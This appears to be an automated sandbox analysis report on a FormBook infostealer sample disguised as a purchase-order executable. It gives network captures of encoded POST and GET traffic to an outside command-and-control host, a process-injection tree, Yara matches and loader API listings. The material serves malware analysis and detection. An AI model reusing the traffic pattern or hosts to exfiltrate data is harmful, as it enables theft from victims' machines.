PZtTT8P0=+AQTPzxuFmex9uTaZLBYUXRsUDQwP3+9h/F7UGLm0PSTNvzV1KFnXKgG1mnK6pkccf8QCJHYVV0MWL1wWwi1I+gdcS1Ggt0HkYDzfC6aUkCLygIrut2YDhFfrXHaCnDhP+/rdEXWobTmle1sNdHxX1DIOMMk7CuesDoz+RSg8Imj1tQbY9yzjsh0L+sxXc+VNFc0moWYySwKxpkek7trFvM=
Jan 15, 2025 19:43:05.435673952 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:43:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUTn%2BGaY0biffVxLdjP%2FufVT2i4VpsXE%2BmUYhvwsVCltCasNuE3JC%2FhNhe9JsvsMfOA2tzXt8yR78ntsWyVJTxKkV6puKqPHwa4w4wYxwHSxPTmKxit3U4jZnZq5f1dWbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90280263e90aa303-YUL Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17856&min_rtt=17856&rtt_var=8928&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=826&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 64 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 92 dd 6e d3 30 1c c5 ef f7 14 ae af d7 a6 db a0 1d 92 53 1e 05 99 c4 a3 ae 92 38 4a bc 8c dc 25 ad 50 bb 11 c1 4a 11 e3 63 da 04 9b d0 26 75 22 12 30 ba ad 2d 0f b3 38 1f 57 7d 05 94 64 43 43 20 ae 2c fb 1c ff ce f1 5f 46 15 95 29 dc 35 09 68 73 5d 6b 2d a1 db 85 60 b5 b5 04 00 00 48 27 1c 03 a5 8d 2d 9b 70 19 6e f2 8d ea 3a bc 2b 19 58 27 32 74 28 d9 32 99 c5 21 50 98 c1 89 c1 65 b8 45 55 de 96 55 e2 50 85 54 8b cd 32 35 28 a7 58 ab da 0a d6 88 bc 52 ab df 92 38 e5 1a 69 a5 9e 2f 46 7e b2 1d 2c 0b 6f 2a e6 7b 71 f7 24 fa f9 31 f5 76 2b 48 2a 1d a5 db 56 2c 6a 72 40 55 19 6a cc 21 c0 65 9b 10 e4 af 90 21 27 4f b9 d4 c1 0e 2e 3d 10 d8 96 22 43 29 b7 d5 3a 36 6c 21 a9 14 fe 24 fd f7 ae 84 4d 5a e3 cc 78 d2 a1 06 c5 ac a6 30 5d 52 1e 3e 92 9b 6b 8d fb 8d 07 8d 95 d5 b5 e6 6a 63 bd de ac df 83 00 db ae a1 dc 09 41 52 39 49 f4 98 a9 ee 4d a6 4a 9d a2 ba 4e 6d bb a8 5e 9e 17 9a 59 28 58 d3 4a 21 ee 7d 15 b3 91 b8 f8 b6 98 06 59 7f 18 0f 06 d9 c8 cf 4e c7 8b [TRUNCATED] Data Ascii: 1dd}n0S8J%PJc&u"0-8W}dCC ,_F)5hs]k-`H'-pn:+X'2t(2!PeEUUPT25(XR8i/F~,o{q$1v+HV,jr@Uj!e!'O.="C):6l!$MZx0]R>kjcAR9IMJNm^Y(XJ!}YNiA4g@\|^TdrMF2\/A0" &?Q*QG+f?0O^W<v{
Jan 15, 2025 19:43:05.435709953 CET	51	IN	Data Raw: 0e a3 cb e7 79 e7 de 2c ba 7a 9b 8c 87 69 38 88 26 67 d7 5e f7 37 18 49 2a 75 f2 01 95 93 41 52 f1 f3 7e 01 c3 60 44 7f 90 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: y,zi8&g^7I*uAR~`D0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	64464	172.67.183.191	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:43:07.651979923 CET	10908	OUT	POST /vslm/ HTTP/1.1 Host: www.6hcwz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.6hcwz.info Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.6hcwz.info/vslm/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 2b 41 51 54 50 7a 78 75 46 6d 65 78 39 75 54 61 5a 4c 42 59 55 58 52 73 55 44 51 77 50 33 2b 39 68 2f 46 37 55 47 4c 6d 30 50 71 54 4f 64 37 56 31 74 70 6e 57 4b 67 47 75 47 6d 74 36 70 6c 65 63 66 6b 55 43 4a 4c 49 56 58 4d 4d 57 74 70 77 44 78 69 31 47 4f 67 64 51 79 31 44 71 4e 30 65 6b 5a 7a 6f 66 43 71 61 55 6b 43 4c 79 69 41 72 6e 59 43 59 46 68 46 63 73 58 48 67 56 33 44 46 50 2b 6e 37 64 45 61 30 30 34 72 6d 6b 36 52 73 4d 76 2f 78 66 31 44 47 64 38 4e 78 37 43 69 42 73 48 49 52 2b 52 4f 4b 38 50 4f 6a 32 4d 78 63 43 70 2b 57 78 74 35 30 66 2f 34 57 66 38 6d 33 55 44 39 4a 75 4c 66 43 68 54 67 62 79 72 6c 56 2b 4c 68 66 55 36 4e 70 43 56 48 77 77 61 53 48 72 47 7a 59 6b 71 51 53 37 73 6c 46 69 34 52 36 2f 4f 33 64 69 7a 59 51 43 34 72 78 6a 76 45 58 72 63 74 75 61 66 51 57 78 42 45 68 36 4d 39 78 6b 57 61 79 5a 59 6f 4a 58 39 77 53 72 32 31 6d 51 63 58 67 66 71 32 6c 36 4d 7a 67 4b 50 68 42 64 73 45 42 34 6c 4a 34 38 76 36 48 33 35 6b 47 58 6e 37 59 53 67 6c 35 69 [TRUNCATED] Data Ascii: PZtTT8P0=+AQTPzxuFmex9uTaZLBYUXRsUDQwP3+9h/F7UGLm0PqTOd7V1tpnWKgGuGmt6plecfkUCJLIVXMMWtpwDxi1GOgdQy1DqN0ekZzofCqaUkCLyiArnYCYFhFcsXHgV3DFP+n7dEa004rmk6RsMv/xf1DGd8Nx7CiBsHIR+ROK8POj2MxcCp+Wxt50f/4Wf8m3UD9JuLfChTgbyrlV+LhfU6NpCVHwwaSHrGzYkqQS7slFi4R6/O3dizYQC4rxjvEXrctuafQWxBEh6M9xkWayZYoJX9wSr21mQcXgfq2l6MzgKPhBdsEB4lJ48v6H35kGXn7YSgl5iUBHfFKNt94Ir1QanORjFfJTt2J0zMU3B4gHbdR/I10HyAVgGjJrkaOOVMj+ReoYsiPYdaJGDvozAbROLYD+5R4mlNSfwD96IMH17+AwNB9JKhBrR2WuS4Cl2eMBya1kMenCz6kaNZYUFrLv0uyfAp4RHw6qXY6t/2u24lD9lob4ZDE0+exty//+ySKGelqw9M28CVF29+HL1rJlVtQNbjvQ296AHP4tpPk4SBjqiBShzg0sndOaf1IiMDJEmjpNJUGr48hPklRcYmfXN2mSX252rnAuquwaM2ndjC2V6ekR5QcsnLtgNbDQHHkK380f/16cMq05bH8++o1LY2QxDwp4V+QZoQjth1ggkPZaswlByKWl55N3FAKAf5/J+5DjFQDvRvl/Ey8+EFpd8Vawfjbai42C8uaR0IrT9xCTLKeko2Dutiwzgnttt6wbRzdRg4fA5WrHCQa6AlOjRedy24VSw1vAPbSIKa0oMtnXA2RDGxkioVUUI/uuvlOnpiHG696HzzXgcN88phijAxaIYWgzzH8fZvcp/POK6RLcahZeHqgCXNR0q9yhst2pU8IAyZqx+QzgDct9HB/7g0T3WPZT9pMrFP9+9UloAm+uFMrslMltcHqPTs8zEYC6HFkL2NrGdd4a+HSOPBAQm9A7Y2rkU+VhkjQc+rh [TRUNCATED]
Jan 15, 2025 19:43:08.536554098 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:43:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5kjm8RlBmVzvw6WOxScCd3e20eME0t%2FZcPwIPSIM%2BGuYEgkqD9Gps9gCHzaJcSVzTMsktSJeXcD%2FLozzNssJ%2B9dlvea5wjaQ%2BcLl9OX3LUl%2F%2F2q08eZtigCHKAG9UadGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902802775faa0a09-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6868&min_rtt=6868&rtt_var=3434&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10908&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 64 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 92 dd 6e d3 30 1c c5 ef f7 14 ae af d7 a6 db a0 1d 92 53 1e 05 99 c4 a3 ae 92 38 4a bc 8c dc 25 ad 50 bb 11 c1 4a 11 e3 63 da 04 9b d0 26 75 22 12 30 ba ad 2d 0f b3 38 1f 57 7d 05 94 64 43 43 20 ae 2c fb 1c ff ce f1 5f 46 15 95 29 dc 35 09 68 73 5d 6b 2d a1 db 85 60 b5 b5 04 00 00 48 27 1c 03 a5 8d 2d 9b 70 19 6e f2 8d ea 3a bc 2b 19 58 27 32 74 28 d9 32 99 c5 21 50 98 c1 89 c1 65 b8 45 55 de 96 55 e2 50 85 54 8b cd 32 35 28 a7 58 ab da 0a d6 88 bc 52 ab df 92 38 e5 1a 69 a5 9e 2f 46 7e b2 1d 2c 0b 6f 2a e6 7b 71 f7 24 fa f9 31 f5 76 2b 48 2a 1d a5 db 56 2c 6a 72 40 55 19 6a cc 21 c0 65 9b 10 e4 af 90 21 27 4f b9 d4 c1 0e 2e 3d 10 d8 96 22 43 29 b7 d5 3a 36 6c 21 a9 14 fe 24 fd f7 ae 84 4d 5a e3 cc 78 d2 a1 06 c5 ac a6 30 5d 52 1e 3e 92 9b 6b 8d fb 8d 07 8d 95 d5 b5 e6 6a 63 bd de ac df 83 00 db ae a1 dc 09 41 52 39 49 f4 98 a9 ee 4d a6 4a 9d a2 ba 4e 6d bb a8 5e 9e 17 9a 59 28 58 d3 4a 21 ee 7d 15 b3 91 b8 f8 b6 98 06 59 7f 18 0f 06 d9 c8 cf 4e c7 8b [TRUNCATED] Data Ascii: 1dd}n0S8J%PJc&u"0-8W}dCC ,_F)5hs]k-`H'-pn:+X'2t(2!PeEUUPT25(XR8i/F~,o{q$1v+HV,jr@Uj!e!'O.="C):6l!$MZx0]R>kjcAR9IMJNm^Y(XJ!}YNiA4g@\|^TdrMF2\/A0" &?Q*QG+f?0O^W<
Jan 15, 2025 19:43:08.536673069 CET	58	IN	Data Raw: 8e ae 76 c4 f1 7b 11 0e a3 cb e7 79 e7 de 2c ba 7a 9b 8c 87 69 38 88 26 67 d7 5e f7 37 18 49 2a 75 f2 01 95 93 41 52 f1 f3 7e 01 c3 60 44 7f 90 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: v{y,zi8&g^7I*uAR~`D0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	64465	172.67.183.191	80

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:43:10.558788061 CET	550	OUT	GET /vslm/?PZtTT8P0=zC4zMG0SLXGKoOyqUI5Abkx/PzoLDn/S8PthLULLwKSzNefTy4ZudJoNt3Kk74AgS/gmI7rmIyltTNtABG2sKNdnUxIQu/0toq2WPl2/BEOTqysptoicMx8=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.6hcwz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:43:11.456967115 CET	774	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:43:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9%2Fi4SXSepJLeqOMRaFYP9QO3zE7ZFhZbndi6awEg2Af%2Buyo4hdHxIno4XaEc6uPz5jtIiJBBIH7S8IHLwcd6o9098Lu%2BdXXbClwSQFJ5Du14432kQ3k2gunuwRQK%2Ba9WQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9028028998b739f4-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13639&min_rtt=13639&rtt_var=6819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 15, 2025 19:43:11.457873106 CET	668	IN	Data Raw: 32 39 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 Data Ascii: 290<!doctype html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <title>,!</title> <script id="love you" type="text/javascript" src="/love.j

Target ID:	0
Start time:	13:40:02
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\New order BPD-003777.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\New order BPD-003777.exe"
Imagebase:	0x280000
File size:	1'178'112 bytes
MD5 hash:	CDBCBD452BCA36DECA0EA24B88293819
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:40:03
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\New order BPD-003777.exe"
Imagebase:	0x920000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2272460449.0000000002980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2276142415.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:40:46
Start date:	15/01/2025
Path:	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe"
Imagebase:	0xc70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	13:40:47
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\colorcpl.exe"
Imagebase:	0x420000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3629802561.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3629846283.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	13:41:00
Start date:	15/01/2025
Path:	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe"
Imagebase:	0xc70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3628819504.0000000000820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	13:41:12
Start date:	15/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff7699e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	2.6%
Signature Coverage:	10.2%
Total number of Nodes:	842
Total number of Limit Nodes:	59

Executed Functions

Function 002842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0028430D

Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A

GetCurrentProcess.KERNEL32(?,0031CB64,00000000,?,?), ref: 00284422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00284429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00284454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00284466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00284474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0028447B
GetSystemInfo.KERNEL32(?,?,?), ref: 002844A0

Strings

GetNativeSystemInfo, xrefs: 00284460
|O, xrefs: 002C36F8
kernel32.dll, xrefs: 0028444F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 213ad3b9ebc562dc58e1bf7fa698451792b44c2c1e976f33b292f84352afb292
Instruction ID: a0c65188b9ac73d385e63d5d583b861dbf3fc3107cfa8a194bc769554bce21dc
Opcode Fuzzy Hash: 213ad3b9ebc562dc58e1bf7fa698451792b44c2c1e976f33b292f84352afb292
Instruction Fuzzy Hash: 71A1D36DA3A3C1DFC713EB687C607957FAC6F36346F1899ACD44193A71D2604918CB21

Function 00283170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,0028316A,?,?), ref: 002831D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0028316A,?,?), ref: 00283204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00283227
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00283232
CreatePopupMenu.USER32 ref: 00283246
PostQuitMessage.USER32(00000000), ref: 00283267

Strings

TaskbarCreated, xrefs: 0028322D

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: e6cb91cfd6907bb0167a8e104c41df5f3daf5afbfa7a552b83f51622062d6545
Instruction ID: 485bf0636fe39fd2f4e39c48ab54c7f1e2891e0aee31aca53e65c23c82e26e1d
Opcode Fuzzy Hash: e6cb91cfd6907bb0167a8e104c41df5f3daf5afbfa7a552b83f51622062d6545
Instruction Fuzzy Hash: 0641293D271205AADB16BF789C1DBBD362DE705F01F044115F906851F1CBE1AE749BA1

Function 002842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002842B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 002842C9
LoadResource.KERNEL32(?,00000000), ref: 002C35BE
SizeofResource.KERNEL32(?,00000000), ref: 002C35D3
LockResource.KERNEL32(?), ref: 002C35E6

Strings

SCRIPT, xrefs: 002842BF

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 16c04b99ca883f66af9fb7add768e29ef08e43251e5533a7fc8b195958ad0888
Instruction ID: 09e6cb130b3bf99ae4af044e2d88694d4c2d1bd7a65952c896be13cc3aa27a88
Opcode Fuzzy Hash: 16c04b99ca883f66af9fb7add768e29ef08e43251e5533a7fc8b195958ad0888
Instruction Fuzzy Hash: 2111A074251306BFDB22AF65DC48FA77BBDEBC9B55F108569F802C6190DB71E810C620

Function 0028D730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0028D807
timeGetTime.WINMM ref: 0028DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028DB28
TranslateMessage.USER32(?), ref: 0028DB7B
DispatchMessageW.USER32(?), ref: 0028DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028DB9F
Sleep.KERNEL32(0000000A), ref: 0028DBB1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 34515ece7df4c3a6d2a3670b1c2ad27b9c3344d4463ad4b9afb1a440a3ebc38a
Instruction ID: 29c62f7752958eb3bb93b08b75a3d0900f1c28b47d5e44b33f4d78aa3ca04fed
Opcode Fuzzy Hash: 34515ece7df4c3a6d2a3670b1c2ad27b9c3344d4463ad4b9afb1a440a3ebc38a
Instruction Fuzzy Hash: 9E420134629342EFD729EF24C844BAAB7A4BF55314F14851AE495873E1D7B0EC68CF82

Function 0028344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00283A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,0028351C,?,?,?,?,0028106A,-00350FC4), ref: 00283A78

Part of subcall function 00283357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00283527,?,?,?,?,0028106A,-00350FC4), ref: 00283379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,0028106A,-00350FC4), ref: 0028356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,0028106A,-00350FC4), ref: 002C318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,0028106A,-00350FC4), ref: 002C31CE
RegCloseKey.ADVAPI32(?,?,?,?,?,0028106A,-00350FC4), ref: 002C3210
_wcslen.LIBCMT ref: 002C3277
_wcslen.LIBCMT ref: 002C3286

Strings

Include, xrefs: 002C3184, 002C31C5
Software\AutoIt v3\AutoIt, xrefs: 00283560
\Include\, xrefs: 00283527
>., xrefs: 002834E8
\, xrefs: 002C328C

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
